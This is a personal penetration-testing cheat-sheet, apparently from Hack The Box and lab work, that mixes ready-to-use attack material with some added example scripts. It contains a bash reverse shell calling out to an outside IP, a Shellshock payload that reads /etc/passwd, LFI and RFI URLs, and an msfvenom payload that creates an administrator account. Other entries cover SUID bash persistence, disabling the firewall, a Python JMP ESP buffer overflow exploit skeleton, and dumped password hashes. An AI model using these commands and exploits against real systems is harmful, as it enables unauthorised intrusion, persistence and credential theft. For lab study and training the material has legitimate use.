ivanitlearning/Pentest-Notes
Pentest-Notes

Some notes for myself

Buffer overflow

In OllyDbg:

  1. Ctrl-G to go to a memory address or expression (e.g. the JMP ESP address you found).
  2. Add a breakpoint (F2) on the JMP ESP instruction.
  3. Ctrl-F2 to restart the program.
  4. F9 to run all the way; the debugger stops at the breakpoint if EIP was redirected correctly.

Windows exploitation

Against a Microsoft FTP server, use dir -a to list hidden files/folders.

Test for blind Windows RCE by making the target ping <Kali-IP> while you listen with tcpdump -i tap0 icmp

Try a reverse shell via RCE with this CMD (the share is hosted on Kali, e.g. with Impacket's smbserver):

start \\10.10.14.36\netmon\shell_443.exe

PowerShell:

powershell.exe cmd /c "ping <kali-ip>"

if you don't know what kind of RCE is allowed.

If you have creds and TCP 5985 is open, try WinRM

root@Kali:~/HTB/Pathfinder# cat winrm_shell.rb 
#!/usr/bin/env ruby
# Minimal interactive WinRM shell (needs the winrm gem: gem install winrm)
require 'winrm'

conn = WinRM::Connection.new(
  endpoint: 'http://10.10.10.30:5985/wsman',
  user: 'MEGACORP\sandra',
  password: 'Password1234!',
)

conn.shell(:powershell) do |shell|
  loop do
    print "PS > "
    command = gets
    # leave on "exit" or on EOF (Ctrl-D) instead of sending them to the remote shell
    break if command.nil? || command.strip == "exit"
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
    code = output.exitcode
    puts "[exit code #{code}]" if code && code != 0
  end
end
root@Kali:~/HTB/Pathfinder# ./winrm_shell.rb 
PS > ls
PS > whoami
megacorp\sandra

Syntax for Impacket's smbexec, psexec and wmiexec (note the domain separator is a forward slash, not a backslash). Drop the domain if it doesn't work.

wmiexec.py "local_admin":"P@ssw0rd123"@10.100.11.100
wmiexec.py "ELS-CHILD/local_admin":"P@ssw0rd123"@10.100.10.253

For a Windows buffer overflow payload, if you can't get a reverse shell, try this one instead. No need to escape anything. It creates a local user "admin" and adds it to Administrators and to Remote Desktop Users, so you can RDP in afterwards. Can't get payload/cmd/windows/generic to work.

root@Kali:~/Infosec/vulnserver# msfvenom -a x86 --platform Windows -p windows/exec CMD='cmd /c net user /add admin Password1 & net localgroup Administrators admin /add & net localgroup "Remote Desktop Users" admin /add' -b '\x00' -f py -v shellcode
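The msfvenom output above (-f py -v shellcode) is meant to be pasted into an exploit script. As an added example that is not part of the original notes, here is the skeleton that puts that blob after the EIP overwrite and the JMP ESP gadget from the OllyDbg steps above: junk up to the offset, the gadget address packed little-endian, a short NOP sled, then the shellcode, with a bad-character check before anything is sent. The offset, the JMP ESP address, the TRUN command prefix and the INT3 stand-in shellcode are assumptions for illustration, not values from the notes; replace them with your own crash analysis and the real msfvenom output.

```python
#!/usr/bin/env python3
"""Stack overflow exploit skeleton for a JMP ESP return (added example).

Assumed values, adjust to your own target:
  OFFSET   bytes written before EIP is overwritten (pattern_create/pattern_offset)
  JMP_ESP  address of a JMP ESP gadget in a module without ASLR/rebase
  BADCHARS bytes the vulnerable parser mangles (the msfvenom -b '\\x00' above)
"""
import socket
import struct

OFFSET = 2003             # assumed: vulnserver TRUN-style offset
JMP_ESP = 0x625011AF      # assumed: JMP ESP inside a non-ASLR DLL (no bad chars)
BADCHARS = b"\x00"        # assumed: must match what msfvenom -b excluded
NOP_SLED = b"\x90" * 16   # small sled so the shellcode survives ESP adjustments

# Constructed stand-in: a few INT3 (0xCC) bytes so the debugger breaks on landing.
# In practice paste the msfvenom '-f py -v shellcode' variable here instead.
shellcode = b"\xcc" * 32


def check_badchars(blob: bytes, badchars: bytes = BADCHARS) -> list:
    """Return offsets of bad characters found in blob (empty list means clean)."""
    return [i for i, b in enumerate(blob) if bytes([b]) in badchars]


def build_payload(shellcode: bytes, offset: int = OFFSET, jmp_esp: int = JMP_ESP) -> bytes:
    """Junk | JMP ESP (little-endian) | NOP sled | shellcode.

    Raises ValueError if the return address or the shellcode contains a bad char,
    which is the usual reason a payload that 'should work' silently dies.
    """
    ret = struct.pack("<I", jmp_esp)
    for name, blob in (("jmp_esp", ret), ("shellcode", shellcode)):
        bad = check_badchars(blob)
        if bad:
            raise ValueError(f"{name} contains bad chars at offsets {bad}")
    return b"A" * offset + ret + NOP_SLED + shellcode


def send_payload(host: str, port: int, payload: bytes, prefix: bytes = b"TRUN /.:/") -> None:
    """Deliver the payload; the TRUN prefix is vulnserver's vulnerable command (assumed target)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)  # banner
        s.sendall(prefix + payload + b"\r\n")


if __name__ == "__main__":
    p = build_payload(shellcode)
    print(f"payload length {len(p)}, bytes landing in EIP: {p[OFFSET:OFFSET + 4].hex()}")
    # send_payload("10.10.10.x", 9999, p)   # uncomment with the real target
```

Run it once with the INT3 stand-in and a breakpoint on JMP ESP: if the debugger stops on 0xCC after the jump, the offset and the return address are right and only the shellcode needs swapping in.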

SMB enum

enum4linux hasn't worked too well.

May have to edit /etc/samba/smb.conf (under [global]) so that smbclient will still negotiate old SMB1 dialects:

   client min protocol = CORE
   client max protocol = SMB3

Try this with smbclient:

smbclient -L 10.130.40.70

smbclient -U''%'' -L 10.130.40.70

smbclient --no-pass -L //172.30.111.10

Use smbmap to map the shares and permissions first, then look at what you can reach with smbclient.

smbmap -u test -p 12345 -H 10.130.40.70
smbclient -U 'test%12345' //10.130.40.70/Documents

or mount the share first and then browse it locally.

Web

Check whether we can do LFI (append a %00 null-byte terminator if the app adds its own extension; PHP only honours it before 5.3.4)

http://members.foocompany.com/index.php?pag=//..//..//..//..//..//..//..//Windows//system32//drivers//etc//hosts%00

See more here https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/

Check for RFI http://members.foocompany.com/index.php?pag=http://172.16.5.20:8000/

Host the directory with python3 -m http.server

Windows post-exp

winPEAS requires .NET 4; check which .NET version is installed first.

Drop nmap.exe on the Windows target to enumerate and port-scan from there. Specify -sT (connect scan), since raw-packet scans need Npcap on the host.

Get RDP if possible; enumeration is easier that way: xfreerdp /v:10.10.10.95:3389 /u:admin /p:Password1 /size:90%

Use robocopy for transferring files from SMBserver

arp-scan.exe for discovering hosts on same subnet

Fping.exe for scanning other subnets. Here Fping pings .1 through .254:

C:\Temp>Fping.exe -g 172.30.111.1/172.30.111.254

Fast pinger version 3.00
(c) Wouter Dhondt (http://www.kwakkelflap.com)

Disable the firewall if possible with C:\Temp>netsh advfirewall set allprofiles state off. Check its status with C:\Temp>netsh advfirewall show allprofiles state

If you can't net use a shared folder, enable File and Printer Sharing via RDP; reboot if necessary.

If you encounter the error "A specified logon session does not exist.", do this

robocopy syntax

C:\Temp\SSFWin32>robocopy \\172.16.10.5\lab9 C:\Temp\SSFWin32 /e

If you need to pivot from Windows and have problems with the existing accounts, create an account and net use with its creds

net use \\10.100.11.101\pivot /user:admin Password1

Use rmdir /s /q to delete recursively on Windows

C:\Tmp>rmdir SSFWin32\SSF-Win32 /s /q

If you somehow have access to SAM, SYSTEM and SECURITY in C:\Windows\System32\config, use Impacket's secretsdump.py

root@Kali:~/HTB/Bastion# secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:e4487d0421e6611a364a5028467e053c:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up... 

Check for the PowerShell history file at C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

If you need to compile a kernel exploit, note that some C code relies on Microsoft-specific headers and extensions and won't build with a normal mingw cross-compilation, i.e. root@Kali:~/HTB/Optimum# x86_64-w64-mingw32-gcc 41015.c -o 41015.exe

Instead, compile it with Developer Command Prompt for Visual Studio (type into Start)

D:\HTB\Optimum>cl 41015.c /link /out:41015_new2.exe
Microsoft (R) C/C++ Optimizing Compiler Version 19.10.25027 for x86
Copyright (C) Microsoft Corporation.  All rights reserved.

41015.c
Microsoft (R) Incremental Linker Version 14.10.25027.0
Copyright (C) Microsoft Corporation.  All rights reserved.

/out:41015.exe
/out:41015_new2.exe
41015.obj

D:\HTB\Optimum>dir 41015_new2.exe
 Volume in drive D is OS
 Volume Serial Number is 0EE7-D347

 Directory of D:\HTB\Optimum

19/04/2020  21:16           123,904 41015_new2.exe
               1 File(s)        123,904 bytes
               0 Dir(s)  589,864,071,168 bytes free

When searching for non-Microsoft software, look in C:\Program Files (x86) and C:\; you might have to dig for creds in those utilities' config files.

Linux exploitation

DNS enum when TCP/UDP 53 is open: nslookup <name-or-IP> <DNS-server>. A reverse lookup of the server's own address often gives away the domain name, e.g.

root@Kali:~/HTB/Cronos# nslookup 10.10.10.13 10.10.10.13
13.10.10.10.in-addr.arpa	name = ns1.cronos.htb.

Then when you get domain, try a DNS zone transfer

dig @<dns server> -t axfr <domain>
root@Kali:~/HTB/Cronos# dig @10.10.10.13 -t axfr cronos.htb

; <<>> DiG 9.11.5-P4-5-Debian <<>> @10.10.10.13 -t axfr cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 307 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Thu Apr 23 23:05:36 +08 2020

Then add these to /etc/hosts and try to access via browser. It can make a difference.
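Added example (Python, not from the original notes) that turns the dig axfr output above into /etc/hosts lines: it keeps only A records, ignores the SOA/NS records and ";;" comment lines, and groups every name that points at the same IP onto one line so a single hosts entry covers all the vhosts. The sample zone is the one shown above, embedded as a constructed string; pipe real dig output into the script on stdin.

```python
#!/usr/bin/env python3
"""dig axfr output -> /etc/hosts lines (added example)."""
import re
import sys
from collections import defaultdict

# Constructed sample: the zone transfer output above.
SAMPLE_AXFR = """\
cronos.htb.\t\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.\t\t604800\tIN\tNS\tns1.cronos.htb.
cronos.htb.\t\t604800\tIN\tA\t10.10.10.13
admin.cronos.htb.\t604800\tIN\tA\t10.10.10.13
ns1.cronos.htb.\t\t604800\tIN\tA\t10.10.10.13
www.cronos.htb.\t\t604800\tIN\tA\t10.10.10.13
;; Query time: 307 msec
"""

# owner name (trailing dot stripped), TTL, IN, A, dotted-quad address
A_RECORD = re.compile(r"^(\S+)\.\s+\d+\s+IN\s+A\s+(\d{1,3}(?:\.\d{1,3}){3})\s*$")


def parse_a_records(axfr_text: str) -> dict:
    """Map IP -> sorted unique hostnames; comments, blank lines and non-A records are skipped."""
    hosts = defaultdict(set)
    for line in axfr_text.splitlines():
        if line.startswith(";") or not line.strip():
            continue
        m = A_RECORD.match(line)
        if m:
            hosts[m.group(2)].add(m.group(1).lower())
    return {ip: sorted(names) for ip, names in hosts.items()}


def hosts_entries(axfr_text: str) -> list:
    """One /etc/hosts line per IP with all of its names."""
    return [f"{ip} {' '.join(names)}" for ip, names in sorted(parse_a_records(axfr_text).items())]


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_AXFR
    print("\n".join(hosts_entries(text)))
```

Usage: dig @10.10.10.13 -t axfr cronos.htb | python3 axfr2hosts.py | sudo tee -a /etc/hosts. CNAME records are not resolved here; add those names by hand if the zone has any.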

If you can do RCE, try nohup bash -c 'bash -i >& /dev/tcp/172.16.5.20/53 0>&1' & (the -c is needed so the quoted string is run as a command rather than opened as a script file)

PHP command exec (useful when the PHP process runs as root) to leave a SUID bash behind:

system("chown root:root /tmp/tmp/bash");
system("chmod u+s /tmp/tmp/bash");

In Burp Repeater (Linux and Windows alike), Ctrl-U URL-encodes the selection and Ctrl-Shift-U URL-decodes it.

Shellshock

  1. Search for the dir /cgi-bin/
  2. If found, search for files with ext .cgi .sh .pl .php
  3. Test with the nmap Shellshock script (either with or without cmd=)
     nmap -sV -Pn -n --script=http-shellshock.nse --script-args uri=/cgi-bin/user.sh,cmd=id 10.10.10.56 -p80
  4. Use curl to check whether you can read /etc/passwd; note the single quotes.
     curl -A '() { foo;};echo Content-type: text/plain; echo; echo; /bin/cat /etc/passwd' http://10.10.10.56/cgi-bin/user.sh
  5. Replace the command with a reverse shell payload. Note that not every Bash build supports /dev/tcp redirections, so if the Bash reverse shell fails try nc or Python.

Linux post-exp

To see cron jobs pertaining to your user crontab -l

Copying files from Linux and want to see progress? Use rsync

root@Kali:~/PTP/Labs/Lab20# rsync -ah --progress /root/Tools/SSF-Win32 /mnt/pivot/SSFWin32
sending incremental file list
created directory /mnt/pivot/SSFWin32

Syntax to get another reverse shell (backgrounded with nohup so it survives the current shell dying)

nohup ./shell_80.elf &

Check if there are any Web servers we missed in /etc/apache2/sites-available/

If you have root command exec but don't want another reverse shell, leave a SUID root copy of bash behind:

cp /bin/bash /tmp/bash
chown root:root /tmp/bash
chmod u+s /tmp/bash

Then run /tmp/bash -p to get a root euid (without -p, bash resets the effective uid back to the real uid).

SUID binaries that don't lead anywhere: see Tr0ll and Vulnix (VulnHub boxes).

How to allow access only by URL and not IP.

wget usage for downloading all files hosted by the Python web server (-r follows the directory listing recursively)

wget -r http://kali.ip:8000/
